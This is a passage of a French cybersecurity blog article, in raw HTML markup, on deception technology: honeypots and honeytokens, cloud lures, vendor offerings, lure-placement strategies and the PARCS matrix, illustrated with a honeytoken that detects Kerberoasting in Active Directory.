<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><b><span data-contrast="none">Distraire</span></b><span data-contrast="none"> l’attaquant</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><b><span data-contrast="none">Analyser</span></b><span data-contrast="none"> les techniques utilisées lors de l’attaque</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22331 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/1.jpg" alt="" width="1040" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/1.jpg 1040w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/1-276x191.jpg 276w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/1-56x39.jpg 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/1-768x532.jpg 768w" sizes="auto, (max-width: 1040px) 100vw, 1040px" /></span></p>
<p style="text-align: justify;"><span data-contrast="none">Cette technologie peut être utilisée à différents degrés de maturité et </span><b><span data-contrast="none">selon les besoins identifiés</span></b><span data-contrast="none">. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Effectivement, cette technologie permet de répondre à plusieurs besoins, vus ci-dessus, or, l’objectif est de déterminer en amont nos exigences face à cette technologie. Si on restreint le besoin à de la détection, il faut noter que la configuration, le déploiement et la maintenance de la Deceptive sera bien moins complexe que si on pousse au maximum les possibilités de cette technologie (exemple : mise en place de scénarios complexes pour leurrer l’attaquant et analyse stratégique de ses faits et gestes).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">Les atouts de la Deceptive </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h3>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Pourquoi la Deceptive ?</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h4>
<p style="text-align: justify;"><span data-contrast="none">Comme abordé dans l’introduction, les challenges actuels de cybersécurité sont nourris par le besoin de détection et réaction face à des attaques grandissantes.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">La </span><b><span data-contrast="none">Deceptive</span></b> <b><span data-contrast="none">ne remplace pas les solutions de cybersécurité standards</span></b><span data-contrast="none"> existantes. Plus complexe, elle agit en </span><b><span data-contrast="none">complément</span></b><span data-contrast="none"> pour </span><b><span data-contrast="none">couvrir tous les types d&rsquo;attaques</span></b><span data-contrast="none">, dont les plus sophistiquées.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Cette technologie n&rsquo;est </span><b><span data-contrast="none">pas conçue pour prévenir une attaque</span></b><span data-contrast="none">, mais pour alerter les équipes de sécurité, minimiser l&rsquo;effet de l&rsquo;attaque et observer le modus operandi de l&rsquo;intrus (« Détecter, Distraire &amp; Analyser »).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Honeypot VS Honeytoken</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h4>
<h5 style="text-align: justify;" aria-level="4"><b><span data-contrast="none">Présentation des termes</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120}"> </span></h5>
<p style="text-align: justify;"><span data-contrast="none">Les leurres peuvent être de nature différente selon le besoin et comment on prévoit de les utiliser. Dans tous les cas, ils prennent l’apparence d’attributs composants notre Système d’Information.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Les leurres les plus connus sont les « </span><b><span data-contrast="none">honeypots</span></b><span data-contrast="none"> ». Ce sont des serveurs ou postes de travail qui vont venir imiter des machines réelles sur le réseau. On retrouve également ce qu’on appelle « honeynet » : un ensemble de serveurs rassemblés en réseau. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Un autre type de leurres intéresse de plus en plus aujourd’hui. C’est un leurre qui vient se cacher directement sur un système. On parle d’abord de « honeyfiles » qui sont généralement représentés par des documents ou autres fichiers qui ont pour rôle de déclencher une alerte lorsque que quelqu’un vient interagir avec eux. Enfin, nous avons les « </span><b><span data-contrast="none">honeytokens</span></b><span data-contrast="none"> » qui sont des données, informations, souvent des secrets ou clés utilisés pour accéder à une ressource factice sur le SI (un honeypot par exemple).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h5 style="text-align: justify;" aria-level="4"><b><span data-contrast="none">Une différence fondamentale</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120}"> </span></h5>
<p style="text-align: justify;"><span data-contrast="none">L’utilisation traditionnelle d’</span><b><span data-contrast="none">honeypots </span></b><span data-contrast="none">peut permettre l’</span><b><span data-contrast="none">observation et la compréhension des actions de l’attaquant </span></b><span data-contrast="none">en plus de la détection d’une intrusion. La difficulté dans ce cas est de configurer un leurre assez attractif et crédible pour que le cyberattaquant tombe dans le piège, sans pour autant livrer des informations pouvant compromettre un composant de notre réelle infrastructure.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">L’intérêt des </span><b><span data-contrast="none">honeytokens</span></b><span data-contrast="none"> est que l’on va travailler un leurre plus complexe certes mais </span><b><span data-contrast="none">plus fin et très crédible</span></b><span data-contrast="none">,</span> <span data-contrast="none">pour ensuite interagir avec le reste de notre piège. Sans les honeytokens, la probabilité que l’on piège un attaquant est plus faible et les résultats d’analyses pas toujours fiables. La dépendance que créer l’honeytoken avec son environnement le rend d’autant plus attractif comparé à un honeypot seul qui ne représente qu’un piège sans possibilité d’escalade par la suite. Pour que les honeypots soient efficaces, il faut recommander le déploiement d’un ou plusieurs honeynets complets, mais le nouveau souci que l’on rencontre ici est le coût d’une telle infrastructure.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h4 style="text-align: justify;" aria-level="3"><span data-contrast="none">Développement de la technologie dans le Cloud</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h4>
<p style="text-align: justify;"><span data-contrast="none">Le défi aujourd’hui pour les éditeurs de solutions </span><b><span data-contrast="none">Deceptive</span></b> <span data-contrast="none">les plus matures, est le développement de services spécifiques dans le </span><b><span data-contrast="none">Cloud</span></b><span data-contrast="none">.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Effectivement, les entreprises utilisent de plus en plus le Cloud pour </span><b><span data-contrast="none">étendre leur stockage</span></b><span data-contrast="none">, </span><b><span data-contrast="none">déployer des machines virtuelles, </span></b><span data-contrast="none">des conteneurs, etc. Cette mise à disposition de services est très populaire et efficace or, l’intérêt pour les cyberattaquants augmente du même temps. Les templates, ou configurations par défaut facilitent la vie des entreprises mais peuvent augmenter les risques de cybersécurité. Même si de nombreux fournisseurs Cloud évolue beaucoup sur le sujet, les configurations par défaut ne répondent pas toujours aux préconisations de sécurité informatique.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le Cloud est donc un nouveau terrain de jeu pour les cyberattaquants. C’est pour cela que l’on s’intéresse aujourd’hui à l’adaptation de nos connaissances de la Deceptive pour </span><b><span data-contrast="none">également protéger les environnements et services Cloud</span></b><span data-contrast="none">.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h2 aria-level="1"> </h2>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Aperçu des principaux éditeurs sur le marché</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559991&quot;:567}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="none">Il faut noter que la </span><b><span data-contrast="none">Deceptive</span></b> <span data-contrast="none">n’est pas réservée uniquement dans des cas d’usage trop complexes. Il existe aujourd’hui </span><b><span data-contrast="none">toutes sortes d’offres sur le marché</span></b><span data-contrast="none">. Certaines proposent des services permettant d’obtenir un outil clé en main complet, alors que d’autres privilégient le sur-mesure, la qualité des leurres et donc plutôt la possibilité d’utiliser leur outil pour créer soi-même ses leurres (configuration et maintenance non gérées par la solution en elle-même).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Voici un aperçu des principaux éditeurs et leurs solutions : </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22333 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/2.jpg" alt="" width="1040" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/2.jpg 1040w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/2-276x191.jpg 276w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/2-56x39.jpg 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/2-768x532.jpg 768w" sizes="auto, (max-width: 1040px) 100vw, 1040px" /></span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Pour certains, la tendance actuelle est de </span><b><span data-contrast="none">s’allier à d’autres outils</span></b><span data-contrast="none"> ou d’intégrer leur solution à des </span><b><span data-contrast="none">EDR</span></b><span data-contrast="none"> (</span><i><span data-contrast="none">Endpoint Detection and Response</span></i><span data-contrast="none">) pour augmenter l’efficacité de la technologie et répondre au besoin du marché.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Comme exprimé précédemment, le challenge que certains ont choisi de relever est de </span><b><span data-contrast="none">s’adapter à un environnement Cloud</span></b><span data-contrast="none">. Par exemple, des solutions comme « Attivo Networks », rachetée par SentinelOne, développent des offres Cloud AWS qui propose la création de leurres en lien avec le service (e.g. : EC2, S3, AWS access keys, etc.).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h2 aria-level="1"> </h2>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Comment construire et placer ses leurres ?</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559991&quot;:567}"> </span></h2>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">Les stratégies de Deceptive </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="none">Une fois avoir pris connaissance de cette technologie et à toutes les possibilités qu’elle apporte, il devient intéressant de se demander quelle.s stratégie.s adopter quant à</span><b><span data-contrast="none"> la quantité de pièges et/ou leurres à implémenter</span></b><span data-contrast="none"> et à </span><b><span data-contrast="none">la</span></b> <b><span data-contrast="none">disposition</span></b><span data-contrast="none"> de ces derniers dans le SI.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Pour s’adapter aux différents cas d’usages, 3 stratégies se détachent </span><b><span data-contrast="none">répondant à des besoins distincts</span></b><span data-contrast="none"> :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22335 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/3.jpg" alt="" width="1040" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/3.jpg 1040w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/3-276x191.jpg 276w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/3-56x39.jpg 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/3-768x532.jpg 768w" sizes="auto, (max-width: 1040px) 100vw, 1040px" /></span></p>
<p style="text-align: justify;"><span data-contrast="none">Effectivement, la stratégie de Deceptive à adopter est souvent sur-mesure </span><b><span data-contrast="none">en fonction de l’infrastructure du SI </span></b><span data-contrast="none">et surtout </span><b><span data-contrast="none">en fonction des priorités et objectifs </span></b><span data-contrast="none">définis au préalable.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><i><span data-contrast="none">À titre d’exemple</span></i><i><span data-contrast="none"> : Si nous sommes dans le cas d’un besoin d’enrichissement de ses technologies de détection au sein de son SI, il peut être intéressant d’étudier la stratégie de « déploiement en masse » de leurres. Ceci a pour volonté de créer un SI fantôme et, ainsi, augmenter la probabilité que le cybercriminel tombe dans un piège qui déclenchera une alerte à destination des équipes de sécurité.</span></i><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">La matrice PARCS</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="none">Le challenge lorsque l’on parle de </span><b><span data-contrast="none">Deceptive</span></b><span data-contrast="none">, et plus spécifiquement de leurres, est de répondre aux questions : Qu’est-ce qu’un bon leurre ? Comment créer un bon leurre ? Où le placer ? Combien en placer ? etc.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">L’article « </span><a href="https://www.cesar-conference.org/wp-content/uploads/2020/12/CESAR2020_070_A-TOURNYOL-du-CLOS_HoneyWISE_v3.pdf"><span data-contrast="none">HoneyWISE : stratégie d’exploitation d’honeytokens en environnement Active Directory</span></a><span data-contrast="none"> », écrit par Augustin TOURNYOL-DU-CLOS et Nathan FAEDDA, propose une stratégie de leurrage contre certaines attaques dans un contexte précis : l&rsquo;AD (Active Directory). Nous aborderons également le sujet des honeytokens, mis en comparaison avec les honeypots, dans la suite de cet article.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Les objectifs de cette étude étaient de </span><b><span data-contrast="none">tester simplement l’implémentation de leurres</span></b><span data-contrast="none"> au sein de l&rsquo;AD et de </span><b><span data-contrast="none">mesurer leur efficacité</span></b><span data-contrast="none"> grâce à la matrice « </span><b><span data-contrast="none">PARCS </span></b><span data-contrast="none">».</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><b><span data-contrast="none">PARCS</span></b><span data-contrast="none"> est ainsi née sur la base de </span><b><span data-contrast="none">5 critères</span></b><span data-contrast="none">, pensée à l’origine dans le contexte d’un environnement AD mais applicable à tous les environnements : </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22337 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/4.jpg" alt="" width="1040" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/4.jpg 1040w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/4-276x191.jpg 276w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/4-56x39.jpg 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/4-768x532.jpg 768w" sizes="auto, (max-width: 1040px) 100vw, 1040px" /></span></p>
<p style="text-align: justify;"><span data-contrast="none">Lors du processus de réalisation d’un leurre, il est conseillé de préparer un </span><b><span data-contrast="none">PARCS</span></b><span data-contrast="none"> pour </span><b><span data-contrast="none">vérifier sa réflexion</span></b><span data-contrast="none"> et valider que celui-ci correspond à nos </span><b><span data-contrast="none">attentes</span></b><span data-contrast="none">. Il faut également penser aux </span><b><span data-contrast="none">besoins</span></b><span data-contrast="none"> minimums illustrés par ces 5 critères : Pertinence, Risque, Crédibilité, Attractivité et Scalabilité.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">À travers cette matrice, l’objectif est d’estimer un besoin pour ensuite </span><b><span data-contrast="none">déterminer une balance</span></b><span data-contrast="none"> d’importance et de priorité sur ces critères (Est-ce que l’attractivité du leurre a de l’importance dans mon cas d’usage ? Est-ce que j’ai besoin d’une solution scalable ? À quel point ? etc.). </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;" aria-level="3"><span data-contrast="none">Exemple de l’utilisation de PARCS : scenario Kerberoasting « Voler ou falsifier des tickets Kerberos »</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:852,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le plus parlant est surement d’illustrer la présentation de la matrice PARCS avec un exemple exposé dans l’article « </span><a href="https://www.cesar-conference.org/wp-content/uploads/2020/12/CESAR2020_070_A-TOURNYOL-du-CLOS_HoneyWISE_v3.pdf"><span data-contrast="none">HoneyWISE</span></a><span data-contrast="none"> ».</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">L’attaque de l’AD appelée </span><b><span data-contrast="none">Kerberoasting</span></b><span data-contrast="none"> est, « […] en synthèse, le brute force offline (pas d’échec de logon) d’un ticket Kerberos recevant le secret d’un compte de service, sans devoir envoyer un seul paquet à ce service ni même être administrateur local du poste compromis ».</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le « […] Kerberoasting </span><b><span data-contrast="none">détourne le fonctionnement natif de Kerberos</span></b><span data-contrast="none"> afin de réaliser une attaque. Ce détournement se fait sur les étapes 3 et 4 de l’authentification Kerberos présentées par le schéma suivant : »</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22339 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/5.jpg" alt="" width="442" height="264" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/5.jpg 442w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/5-320x191.jpg 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/01/5-65x39.jpg 65w" sizes="auto, (max-width: 442px) 100vw, 442px" /></span></p>
<p style="text-align: justify;"><span data-contrast="none">Pour ce cas d’attaque, Augustin TOURNYOL-DU-CLOS et Nathan FAEDDA proposent dans leur </span><a href="https://www.cesar-conference.org/wp-content/uploads/2020/12/CESAR2020_070_A-TOURNYOL-du-CLOS_HoneyWISE_v3.pdf"><span data-contrast="none">article</span></a><span data-contrast="none"> de déployer un honeytoken contre le Kerberoasting (voir partie 2.3 « Description des scénarios de détection » &#8211; scénario 2).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Voici le résultat, à travers PARCS, de l’étude de ce type d’honeytoken dans le cadre d’un scénario de Kerberoasting (16/20) :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><b><span data-contrast="none">P</span></b><span data-contrast="none">ertinence : 4/4</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">« Les alertes générées par ce honeytoken sont fiables. En effet, à partir du moment où un ticket TGS est demandé pour accéder à service non-utilisé et inexistant, il apparait clairement qu’une action malveillante est en cours. »</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:993,&quot;335559731&quot;:0,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[0]}"> </span></li>
</ul>
</li>
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><b><span data-contrast="none">A</span></b><span data-contrast="none">ttractivité : 3/4</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><span data-contrast="none">« L’attractivité de ce token repose dans le fait que la réalisation de l’attaque ne nécessite pas de privilèges et permet potentiellement d’en gagner tout en étant silencieuse (génération de trafic jugé légitime). Sous réserve que le compte choisi pour leurrer l’attaquant paraisse privilégié et géré par un utilisateur (afin que le mot de passe soit vraisemblablement simple) ce honeytoken est donc fortement attractif. »</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:993,&quot;335559731&quot;:0,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[0]}"> </span></li>
</ul>
</li>
